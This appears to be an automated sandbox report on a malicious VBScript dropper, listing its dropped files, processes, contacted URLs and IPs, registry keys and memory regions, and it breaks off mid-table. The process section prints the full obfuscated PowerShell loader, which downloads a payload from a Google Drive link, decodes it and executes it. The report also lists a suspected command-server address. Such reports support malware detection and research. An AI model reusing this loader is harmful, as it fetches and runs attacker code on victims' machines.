Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Bnnebgers.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ey4v2zi.ok2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gzubedel.xmm.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uecyenhh.sxt.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vzqw4cmq.vcz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\188E93\31437F.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\188E93\31437F.lck
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Assimileringens.Lan
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06
|
data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Bnnebgers.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Frijsenborg Amateurism Knallertfreren Unplaiting #>;$Uniformsfrakke='tingene';<#Gaffelens
Slgtsarv kommunevalgene Catalufas kalkeringens Skibsreders Pyrolysevrk #>;$Soundly=$host.PrivateData;If ($Soundly) {$Realters++;}function
Burnets254($Sewings){$Noncataclysmic=$Bronzedren+$Sewings.Length-$Realters;for( $Hulede=5;$Hulede -lt $Noncataclysmic;$Hulede+=6){$Extratropical+=$Sewings[$Hulede];}$Extratropical;}function
Iba($Charbroiled){ . ($Beslaglgning) ($Charbroiled);}$Aarendes=Burnets254 'SelvpMKapnioBeg az OpsaiThymylT.anslG
anua Prim/Klyng5 Penu.Musta0perin Sch,o(EmbadWGldssiHaulanAns.ndStavnoMa wawTaaresoverf BaptNUbiquT rem Borg 1Uncon0Choko.
dlis0Viktu;Nonvo ,spsWNussei aboonDob e6 vine4Un.ro;.erag SkamfxDrill6reuss4Natur;T.ght Hathr DousvCroqu:bouc 1Snapd2Byg.e1Lremi.Krens0Truck)Unort
KarmiGOtt,keDezinco ergkStuttoEnera/ Fast2 Tryk0Slutv1N hed0F,dig0En er1Z osp0Mu.kl1Ir tt GuiluFFodgniRaulirAfooteOversfT
lukosengexSprin/ Pref1 ille2R.fer1 Shar.Disap0 Inqu ';$Roskilde190=Burnets254 'confeuIntersChunkE SecorAab n-Mist aKalvegdahabeCohobNUnsetTFremt
';$Hyetograph=Burnets254 'AfkrihAdfrdtBugmutSnivepFri as,onst:Subve/Jagtl/ munddUsk,er R iniAm invBorsye onn.SlidsgToupeo
Hyp oEnsilgChoralfr dleRecha.Proloc Bryso FiskmAbild/ FootuInorgcRosel?No,paeVocabx S ifpglo toHazierDiurnt ider=Ph lodpjathoBasiswRetennSlavilC,nopoUndgaaBalerdI
gro& orfiStv,odSnitm= Lich1SkirpnBaadeqRedecj SagnXUnan M Hid.k CounuNidsty Sade0K,onjHNonsyQAnathzLegitkEurop_camoui,uttrG
SepacBerkeo efirA E nsJAfkorbStineDAntisrSkrivbArchlsEstraZkjersjForreA SkrivSkrm x Kl eABunkrb Find ';$Kiasmers=Burnets254
'za fr>Styrt ';$Beslaglgning=Burnets254 'BoersI rdelEPraesXOv rv ';$Skibssidernes='Snarligt';$Rettelsesblad='\Assimileringens.Lan';Iba
(Burnets254 ' earj$antihg konnlSkoleoG umpb Lycta Owenl Fnbl:MordaCLogiey .omblMylodiSugiln FraudLoadaeLakserpedeseSort r
Bill=Nonsp$ AktieNephrn EkskvUa hn:Prluda Fs,epD,onqp,nobbdP.lsya yclotSammeaDipso+ arch$DatabR VinteElatet L,vetGlanse.yperlUnsucsFortreOveresMaelsbDesealCatalaHerhjdNonin
');Iba (Burnets254 ' lapp$SpinkgTvi llMediaoHe.heb.elesaHema lBeful:App eSIn.alc nurrrBrn pasketcwBetjelpremysak de=Mglin$
FradH U fryR,cureFla rtBursio llesgarve,rpseudaU.ennpSuverhBundv.KukkesP.melpSkulel KnusiSpanktAnari( obbl$FagblK Udebi,ingia
F easBrovtmYmeree L ver angrsFrimu) M,cu ');Iba (Burnets254 'T erm[ D,agNSpr,ne ProbtSil c. nyprS Aq.aeSpi sr UnonvCor ciRa
lecSubureD.belPN.ntao AlsmiTyrannTechntArranMBiltyaOvermnDobbeaDialogAnk eetricor Pinc] Nonc: .orr:a.kanSabonneTvangcPjas.uphtharMo
tgi RrsmtNetvryun.ncPpicadrBarbaoinarctUnveroBrodechovedoUagtsl Per, de sk=Moder Bokma[uds aNRunkeeUnlyrtRe ak.Korr.Satione
ubinc SexiuSlappr imbeiU diatArbejyHay.yPTilslrurt ko Tildt estaoUndutcAneu oEledol Per,TAut,syL.ttep Vipsesyned]Sjusk:Lodd.:.nsisT
ymbilIkrafsCy,li1Trkni2 Dato ');$Hyetograph=$Scrawls[0];$Brnevold=(Burnets254 'Shudd$PrdikGEkspelSha eO Overb V nsaCoreglHande:Hvid
i Um,dDAircoEAndvaOunderGFloppEPallbnAffejO Met UModulSL.ngw=DrikknPassaEHyperwSygel- OuncoTeglsb ,oguJP,ddeeSi icC odfuTSamme
HistoSDr,geYUn elSStanitSte.seDav dmS ipj. DugpnElutrePoultTBilet.Ei htw He lEinchwb V,edcBedraLFiskeIArbejEMiljbNForskTHavre
');Iba ($Brnevold);Iba (Burnets254 'Jaege$Brugei BlsedUgeskeWeakeo tunng For eStvdrnProgroRadiuuJoyf sFster.CountH PinoeForziaOc,ondOpholeS
ibsr Wa.nsLokal[ Ande$.viboRExteno StylsKarrykStyrgiAllerlResp.dUnchueNonre1Pukke9Bromi0P ten] Nonp= n nt$SynodAKri eaGigsfrSphaceBl
sdnF,rbrdPandeeK,ritsD,kim ');$Stryges88=Burnets254 'Mowss$Miljtibre.fdC ckneSavelo R megBesagePu arnTacitoAutoruInexps Mand.
to,aD OffeoDo.erwExtranSubmulTriamoDefeaaLiveddMiljbF CoeliVestelLa yve Seig(Bisul$Ri.hsHTelefy arebePatrit TurdoSystegD lprrMiliea
rystpTigerhEspio,,tart$ ref PHastir TeddoFe.itxSkreseforl,n rbejeEuroetBervi) Sen ';$Proxenet=$Cylinderer;Iba (Burnets254
'Sodav$RecidGSpiflL S emOMlke.BT turaStroslRecir:AbstaA OverBFuddlYTuggeEbe ludPreha=Depor(TudseTBevgeEDispls,hototL tes-Badebp
BeleAAdju tB topHJomfr Kvkk$ thypHero,R HaemOLavenX U reETimetNCoinseExcurt,atro)Filmn ');while (!$Abyed) {Iba (Burnets254
'Tangf$Pres.gPouchlGo,ifoPacifbProctaLumbrlMedia:DecalPRemicofunb,sForuriObovatC sariC.lluvEksisiChlo.sSlovetforeteArchinMarat=,emat$
ArmotTubberNonbiu RobieAot a ') ;Iba $Stryges88;Iba (Burnets254 ',adanSCollit Ariza AnelrSkruet Selv- KlbeS ndelHemateAndroeFri
zpBukke Recr.4partr ');Iba (Burnets254 'Am.er$Gingeg U.gllBrddeoGarsibDisenaKonfolBogbr:Be.fiA DigibTittiyPrepaeEnd sdGenea=Pry,l(RosewT
Phote abylsPhilotRdhov-BotanPVagtfa hirotDeli hI dst Downt$ uperPHemmerProp.oRevacxInstreBehann Ele.e SolatForhe)G ave ')
;Iba (Burnets254 'E,poi$OphavgUnheslDelkaoYokonbPerboa Oc.olSlem.:MikroRRollobCongrdT knoiGold.gHamatePilgrrPit ie fort= p
us$TriumgFuglelpe ecoFofarbUndisa U,drlDefla:PuddlCBefolyfin,esSurtatZidaloI.dbls Mis.pAlarmaMbelfs apsom ,lou+Melod+folke%
Cz.r$UnthiS P,ricSolarrBas.saAntndwLikablSwervsTaeni.Farvec eproFringuRegdnn Paratforl ') ;$Hyetograph=$Scrawls[$Rbdigere];}$Bemandingers=312136;$Baksningens=32559;Iba
(Burnets254 'Brief$Aalekg rogrl FremoLaconb Embuatnde l Mill: MillKOffeniEncrimBenz ewoollrSuperiSi,ped evisg SnoriSkossa
lokhnkaosj Fe.b=Tilk ChadaGKolo eTrskrtStbef-interCN umdoKnortnFo.tst,trigeHanken Unsat lith Bo il$Disp,PSaesorSneenoRe
oixDayfleDisrunKetokeMaaletS,lla ');Iba (Burnets254 ' Skul$Rull.gFarvelUnu.toAuxocbV.redaKnsobl life:BouzoPMgt.grCentroHa
ild Tan,uJunkikSporottypehu ForudForu v BesriRoyalkTilsjlRepute tarerDete.eSheetsSvige Shang=Auk i Repl[DuettSSno,byTllins
rmout onteeOutpumHaveb. ryskCUdlgsoKamutndispovregreeMatchrEnsnatAlca ]Sudan:Slave:EjendFstaldr Incro estmLutetB utreaPenros
UndeeCar,t6Pneum4 ljeS eptatPhymarEk.triBrevsn Pol,gSkvis(Ultim$StoreKTorskiNintum ilepe BalarD.triiBortrd SyrugSysteivizieaRensknBe
be)Daudk ');Iba (Burnets254 'Tyros$ Agg g Ove l folkoTempobBarcoa UdsplProt : SkjtPNonineTranspHepatp RefleBasiarPentiwPauseoD
rerrUdblstNort 4 G,nm Blost=Mul,i G,ne[GnallSPrin yPseudsGlycatplanteK,ttam Dio,.RadioTEklekeUn eaxRundetHuave.Drik.EAbbrenUdgancinagiopatacdAflevi
StuvnK,nvegHasta] Slae: hitf:SivskA Min SProstCMurchIPaileIGlyco.nonheGTroldeDrilltOrthoSca,ast .litr FastiCeyl nRangfg egni(E,mer$DevilPNabo.rT
areoS bcadpyramu Batik Applt Cragu Uno dl.rmev InfoiBantukforstlWaddieAtombrPyromeRestasAtte )Uraci ');Iba (Burnets254 ' Pryi$Fl.rigLin.elfatt.oS
degbKombiaParoclSorbo:RegisS.rundcstemmrD tapu Tr,pt BegyaArthrtStrk oBegynrImput=under$Fe,emPDia.ee engpMedicpD,aloeNudamrJapanw.ayero,psolr
Ballt .age4 abom. MellsBasinuInvalbTegnesMonottR adirSliveiBo genForskgSpec,(Pre o$SokleB Monoe UncamS natahemitn Besod FiltiD,zennHuskigImplue
.ingr TrylsOccas,Sesq $ Bej.BP,agoaAnomakKumy,sVela,nLdig iKa minT ssagDivereTrldonKya,nsF,ott)Omreg ');Iba $Scrutator;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Frijsenborg Amateurism Knallertfreren Unplaiting #>;$Uniformsfrakke='tingene';<#Gaffelens
Slgtsarv kommunevalgene Catalufas kalkeringens Skibsreders Pyrolysevrk #>;$Soundly=$host.PrivateData;If ($Soundly) {$Realters++;}function
Burnets254($Sewings){$Noncataclysmic=$Bronzedren+$Sewings.Length-$Realters;for( $Hulede=5;$Hulede -lt $Noncataclysmic;$Hulede+=6){$Extratropical+=$Sewings[$Hulede];}$Extratropical;}function
Iba($Charbroiled){ . ($Beslaglgning) ($Charbroiled);}$Aarendes=Burnets254 'SelvpMKapnioBeg az OpsaiThymylT.anslG
anua Prim/Klyng5 Penu.Musta0perin Sch,o(EmbadWGldssiHaulanAns.ndStavnoMa wawTaaresoverf BaptNUbiquT rem Borg 1Uncon0Choko.
dlis0Viktu;Nonvo ,spsWNussei aboonDob e6 vine4Un.ro;.erag SkamfxDrill6reuss4Natur;T.ght Hathr DousvCroqu:bouc 1Snapd2Byg.e1Lremi.Krens0Truck)Unort
KarmiGOtt,keDezinco ergkStuttoEnera/ Fast2 Tryk0Slutv1N hed0F,dig0En er1Z osp0Mu.kl1Ir tt GuiluFFodgniRaulirAfooteOversfT
lukosengexSprin/ Pref1 ille2R.fer1 Shar.Disap0 Inqu ';$Roskilde190=Burnets254 'confeuIntersChunkE SecorAab n-Mist aKalvegdahabeCohobNUnsetTFremt
';$Hyetograph=Burnets254 'AfkrihAdfrdtBugmutSnivepFri as,onst:Subve/Jagtl/ munddUsk,er R iniAm invBorsye onn.SlidsgToupeo
Hyp oEnsilgChoralfr dleRecha.Proloc Bryso FiskmAbild/ FootuInorgcRosel?No,paeVocabx S ifpglo toHazierDiurnt ider=Ph lodpjathoBasiswRetennSlavilC,nopoUndgaaBalerdI
gro& orfiStv,odSnitm= Lich1SkirpnBaadeqRedecj SagnXUnan M Hid.k CounuNidsty Sade0K,onjHNonsyQAnathzLegitkEurop_camoui,uttrG
SepacBerkeo efirA E nsJAfkorbStineDAntisrSkrivbArchlsEstraZkjersjForreA SkrivSkrm x Kl eABunkrb Find ';$Kiasmers=Burnets254
'za fr>Styrt ';$Beslaglgning=Burnets254 'BoersI rdelEPraesXOv rv ';$Skibssidernes='Snarligt';$Rettelsesblad='\Assimileringens.Lan';Iba
(Burnets254 ' earj$antihg konnlSkoleoG umpb Lycta Owenl Fnbl:MordaCLogiey .omblMylodiSugiln FraudLoadaeLakserpedeseSort r
Bill=Nonsp$ AktieNephrn EkskvUa hn:Prluda Fs,epD,onqp,nobbdP.lsya yclotSammeaDipso+ arch$DatabR VinteElatet L,vetGlanse.yperlUnsucsFortreOveresMaelsbDesealCatalaHerhjdNonin
');Iba (Burnets254 ' lapp$SpinkgTvi llMediaoHe.heb.elesaHema lBeful:App eSIn.alc nurrrBrn pasketcwBetjelpremysak de=Mglin$
FradH U fryR,cureFla rtBursio llesgarve,rpseudaU.ennpSuverhBundv.KukkesP.melpSkulel KnusiSpanktAnari( obbl$FagblK Udebi,ingia
F easBrovtmYmeree L ver angrsFrimu) M,cu ');Iba (Burnets254 'T erm[ D,agNSpr,ne ProbtSil c. nyprS Aq.aeSpi sr UnonvCor ciRa
lecSubureD.belPN.ntao AlsmiTyrannTechntArranMBiltyaOvermnDobbeaDialogAnk eetricor Pinc] Nonc: .orr:a.kanSabonneTvangcPjas.uphtharMo
tgi RrsmtNetvryun.ncPpicadrBarbaoinarctUnveroBrodechovedoUagtsl Per, de sk=Moder Bokma[uds aNRunkeeUnlyrtRe ak.Korr.Satione
ubinc SexiuSlappr imbeiU diatArbejyHay.yPTilslrurt ko Tildt estaoUndutcAneu oEledol Per,TAut,syL.ttep Vipsesyned]Sjusk:Lodd.:.nsisT
ymbilIkrafsCy,li1Trkni2 Dato ');$Hyetograph=$Scrawls[0];$Brnevold=(Burnets254 'Shudd$PrdikGEkspelSha eO Overb V nsaCoreglHande:Hvid
i Um,dDAircoEAndvaOunderGFloppEPallbnAffejO Met UModulSL.ngw=DrikknPassaEHyperwSygel- OuncoTeglsb ,oguJP,ddeeSi icC odfuTSamme
HistoSDr,geYUn elSStanitSte.seDav dmS ipj. DugpnElutrePoultTBilet.Ei htw He lEinchwb V,edcBedraLFiskeIArbejEMiljbNForskTHavre
');Iba ($Brnevold);Iba (Burnets254 'Jaege$Brugei BlsedUgeskeWeakeo tunng For eStvdrnProgroRadiuuJoyf sFster.CountH PinoeForziaOc,ondOpholeS
ibsr Wa.nsLokal[ Ande$.viboRExteno StylsKarrykStyrgiAllerlResp.dUnchueNonre1Pukke9Bromi0P ten] Nonp= n nt$SynodAKri eaGigsfrSphaceBl
sdnF,rbrdPandeeK,ritsD,kim ');$Stryges88=Burnets254 'Mowss$Miljtibre.fdC ckneSavelo R megBesagePu arnTacitoAutoruInexps Mand.
to,aD OffeoDo.erwExtranSubmulTriamoDefeaaLiveddMiljbF CoeliVestelLa yve Seig(Bisul$Ri.hsHTelefy arebePatrit TurdoSystegD lprrMiliea
rystpTigerhEspio,,tart$ ref PHastir TeddoFe.itxSkreseforl,n rbejeEuroetBervi) Sen ';$Proxenet=$Cylinderer;Iba (Burnets254
'Sodav$RecidGSpiflL S emOMlke.BT turaStroslRecir:AbstaA OverBFuddlYTuggeEbe ludPreha=Depor(TudseTBevgeEDispls,hototL tes-Badebp
BeleAAdju tB topHJomfr Kvkk$ thypHero,R HaemOLavenX U reETimetNCoinseExcurt,atro)Filmn ');while (!$Abyed) {Iba (Burnets254
'Tangf$Pres.gPouchlGo,ifoPacifbProctaLumbrlMedia:DecalPRemicofunb,sForuriObovatC sariC.lluvEksisiChlo.sSlovetforeteArchinMarat=,emat$
ArmotTubberNonbiu RobieAot a ') ;Iba $Stryges88;Iba (Burnets254 ',adanSCollit Ariza AnelrSkruet Selv- KlbeS ndelHemateAndroeFri
zpBukke Recr.4partr ');Iba (Burnets254 'Am.er$Gingeg U.gllBrddeoGarsibDisenaKonfolBogbr:Be.fiA DigibTittiyPrepaeEnd sdGenea=Pry,l(RosewT
Phote abylsPhilotRdhov-BotanPVagtfa hirotDeli hI dst Downt$ uperPHemmerProp.oRevacxInstreBehann Ele.e SolatForhe)G ave ')
;Iba (Burnets254 'E,poi$OphavgUnheslDelkaoYokonbPerboa Oc.olSlem.:MikroRRollobCongrdT knoiGold.gHamatePilgrrPit ie fort= p
us$TriumgFuglelpe ecoFofarbUndisa U,drlDefla:PuddlCBefolyfin,esSurtatZidaloI.dbls Mis.pAlarmaMbelfs apsom ,lou+Melod+folke%
Cz.r$UnthiS P,ricSolarrBas.saAntndwLikablSwervsTaeni.Farvec eproFringuRegdnn Paratforl ') ;$Hyetograph=$Scrawls[$Rbdigere];}$Bemandingers=312136;$Baksningens=32559;Iba
(Burnets254 'Brief$Aalekg rogrl FremoLaconb Embuatnde l Mill: MillKOffeniEncrimBenz ewoollrSuperiSi,ped evisg SnoriSkossa
lokhnkaosj Fe.b=Tilk ChadaGKolo eTrskrtStbef-interCN umdoKnortnFo.tst,trigeHanken Unsat lith Bo il$Disp,PSaesorSneenoRe
oixDayfleDisrunKetokeMaaletS,lla ');Iba (Burnets254 ' Skul$Rull.gFarvelUnu.toAuxocbV.redaKnsobl life:BouzoPMgt.grCentroHa
ild Tan,uJunkikSporottypehu ForudForu v BesriRoyalkTilsjlRepute tarerDete.eSheetsSvige Shang=Auk i Repl[DuettSSno,byTllins
rmout onteeOutpumHaveb. ryskCUdlgsoKamutndispovregreeMatchrEnsnatAlca ]Sudan:Slave:EjendFstaldr Incro estmLutetB utreaPenros
UndeeCar,t6Pneum4 ljeS eptatPhymarEk.triBrevsn Pol,gSkvis(Ultim$StoreKTorskiNintum ilepe BalarD.triiBortrd SyrugSysteivizieaRensknBe
be)Daudk ');Iba (Burnets254 'Tyros$ Agg g Ove l folkoTempobBarcoa UdsplProt : SkjtPNonineTranspHepatp RefleBasiarPentiwPauseoD
rerrUdblstNort 4 G,nm Blost=Mul,i G,ne[GnallSPrin yPseudsGlycatplanteK,ttam Dio,.RadioTEklekeUn eaxRundetHuave.Drik.EAbbrenUdgancinagiopatacdAflevi
StuvnK,nvegHasta] Slae: hitf:SivskA Min SProstCMurchIPaileIGlyco.nonheGTroldeDrilltOrthoSca,ast .litr FastiCeyl nRangfg egni(E,mer$DevilPNabo.rT
areoS bcadpyramu Batik Applt Cragu Uno dl.rmev InfoiBantukforstlWaddieAtombrPyromeRestasAtte )Uraci ');Iba (Burnets254 ' Pryi$Fl.rigLin.elfatt.oS
degbKombiaParoclSorbo:RegisS.rundcstemmrD tapu Tr,pt BegyaArthrtStrk oBegynrImput=under$Fe,emPDia.ee engpMedicpD,aloeNudamrJapanw.ayero,psolr
Ballt .age4 abom. MellsBasinuInvalbTegnesMonottR adirSliveiBo genForskgSpec,(Pre o$SokleB Monoe UncamS natahemitn Besod FiltiD,zennHuskigImplue
.ingr TrylsOccas,Sesq $ Bej.BP,agoaAnomakKumy,sVela,nLdig iKa minT ssagDivereTrldonKya,nsF,ott)Omreg ');Iba $Scrutator;"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://137.184.191.215/index.php/039
|
137.184.191.215
|
|
|
|
https://www.google.com
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.googP
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.googh
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com/pb
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://drive.usercontent.google.com/Db
|
unknown
|
There are 13 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
drive.google.com
|
142.250.185.206
|
||
|
drive.usercontent.google.com
|
142.250.184.193
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
137.184.191.215
|
unknown
|
United States
|
|
|
|
142.250.185.206
|
drive.google.com
|
United States
|
||
|
142.250.184.193
|
drive.usercontent.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\??????????????????????????????????
|
188E93
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
8BE0000
|
direct allocation
|
page execute and read and write
|
|
|
|
5FEB000
|
trusted library allocation
|
page read and write
|
|
|
|
1CA5698E000
|
trusted library allocation
|
page read and write
|
|
|
|
BE9C000
|
direct allocation
|
page execute and read and write
|
|
|
|
4E30000
|
heap
|
page execute and read and write
|
||
|
8B0B000
|
stack
|
page read and write
|
||
|
86B0000
|
trusted library allocation
|
page read and write
|
||
|
8730000
|
direct allocation
|
page read and write
|
||
|
8570000
|
heap
|
page read and write
|
||
|
8480000
|
heap
|
page read and write
|
||
|
89B5000
|
trusted library allocation
|
page read and write
|
||
|
71FE000
|
stack
|
page read and write
|
||
|
AA9C000
|
direct allocation
|
page execute and read and write
|
||
|
33E0000
|
trusted library allocation
|
page read and write
|
||
|
87C0000
|
heap
|
page read and write
|
||
|
1CA469A5000
|
trusted library allocation
|
page read and write
|
||
|
A09C000
|
direct allocation
|
page execute and read and write
|
||
|
77A6000
|
heap
|
page read and write
|
||
|
1CA48599000
|
trusted library allocation
|
page read and write
|
||
|
18BDA8BE000
|
heap
|
page read and write
|
||
|
18BDA939000
|
heap
|
page read and write
|
||
|
18BDA7F0000
|
heap
|
page read and write
|
||
|
2D9C000
|
stack
|
page read and write
|
||
|
3470000
|
heap
|
page read and write
|
||
|
18BDA93B000
|
heap
|
page read and write
|
||
|
F76739000
|
stack
|
page read and write
|
||
|
1CA474FA000
|
trusted library allocation
|
page read and write
|
||
|
1CA5EE76000
|
heap
|
page read and write
|
||
|
7FFD9BC20000
|
trusted library allocation
|
page read and write
|
||
|
18BDC630000
|
heap
|
page read and write
|
||
|
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC00000
|
trusted library allocation
|
page read and write
|
||
|
2DD9000
|
stack
|
page read and write
|
||
|
30B0000
|
heap
|
page read and write
|
||
|
18BDA946000
|
heap
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CA46DDB000
|
trusted library allocation
|
page read and write
|
||
|
7380000
|
direct allocation
|
page read and write
|
||
|
1CA5EEF9000
|
heap
|
page read and write
|
||
|
8C70000
|
trusted library allocation
|
page read and write
|
||
|
8600000
|
direct allocation
|
page read and write
|
||
|
1CA46B48000
|
trusted library allocation
|
page read and write
|
||
|
1CA5ED41000
|
heap
|
page read and write
|
||
|
23BED000
|
stack
|
page read and write
|
||
|
85F0000
|
direct allocation
|
page read and write
|
||
|
7B60000
|
trusted library allocation
|
page read and write
|
||
|
1CA44D30000
|
heap
|
page read and write
|
||
|
3460000
|
heap
|
page readonly
|
||
|
87C9000
|
heap
|
page read and write
|
||
|
7FFD9B8D4000
|
trusted library allocation
|
page read and write
|
||
|
30B9000
|
heap
|
page read and write
|
||
|
1CA44EC0000
|
heap
|
page read and write
|
||
|
18BDC5F7000
|
heap
|
page read and write
|
||
|
1CA467D4000
|
heap
|
page read and write
|
||
|
8780000
|
direct allocation
|
page read and write
|
||
|
7FFD9BB30000
|
trusted library allocation
|
page read and write
|
||
|
18BDA91A000
|
heap
|
page read and write
|
||
|
18BDC601000
|
heap
|
page read and write
|
||
|
F7750A000
|
stack
|
page read and write
|
||
|
1CA485B4000
|
trusted library allocation
|
page read and write
|
||
|
316D000
|
heap
|
page read and write
|
||
|
18BDA7F5000
|
heap
|
page read and write
|
||
|
33CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BB70000
|
trusted library allocation
|
page read and write
|
||
|
18BDC5D0000
|
heap
|
page read and write
|
||
|
74B0000
|
heap
|
page read and write
|
||
|
1CA474CB000
|
trusted library allocation
|
page read and write
|
||
|
F7683E000
|
stack
|
page read and write
|
||
|
8857000
|
heap
|
page read and write
|
||
|
18BDC5FC000
|
heap
|
page read and write
|
||
|
85E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8D2000
|
trusted library allocation
|
page read and write
|
||
|
F762FE000
|
stack
|
page read and write
|
||
|
8846000
|
heap
|
page read and write
|
||
|
3239000
|
heap
|
page read and write
|
||
|
18BDA87F000
|
heap
|
page read and write
|
||
|
8B90000
|
trusted library allocation
|
page execute and read and write
|
||
|
F764FE000
|
stack
|
page read and write
|
||
|
1CA46921000
|
trusted library allocation
|
page read and write
|
||
|
18BDA87A000
|
heap
|
page read and write
|
||
|
23FF0000
|
direct allocation
|
page read and write
|
||
|
1CA46DB5000
|
trusted library allocation
|
page read and write
|
||
|
87A0000
|
heap
|
page read and write
|
||
|
1CA44CE6000
|
heap
|
page read and write
|
||
|
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
|
88A7000
|
heap
|
page read and write
|
||
|
1CA5EEF1000
|
heap
|
page read and write
|
||
|
18BDC5F0000
|
heap
|
page read and write
|
||
|
F7627E000
|
stack
|
page read and write
|
||
|
8841000
|
heap
|
page read and write
|
||
|
5FD1000
|
trusted library allocation
|
page read and write
|
||
|
F7738E000
|
stack
|
page read and write
|
||
|
1CA44CF7000
|
heap
|
page read and write
|
||
|
23AEE000
|
stack
|
page read and write
|
||
|
18BDA91D000
|
heap
|
page read and write
|
||
|
23F1E000
|
stack
|
page read and write
|
||
|
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
|
3370000
|
heap
|
page read and write
|
||
|
8750000
|
heap
|
page read and write
|
||
|
33F5000
|
trusted library allocation
|
page execute and read and write
|
||
|
33EA000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D2C000
|
remote allocation
|
page execute and read and write
|
||
|
1CA56C17000
|
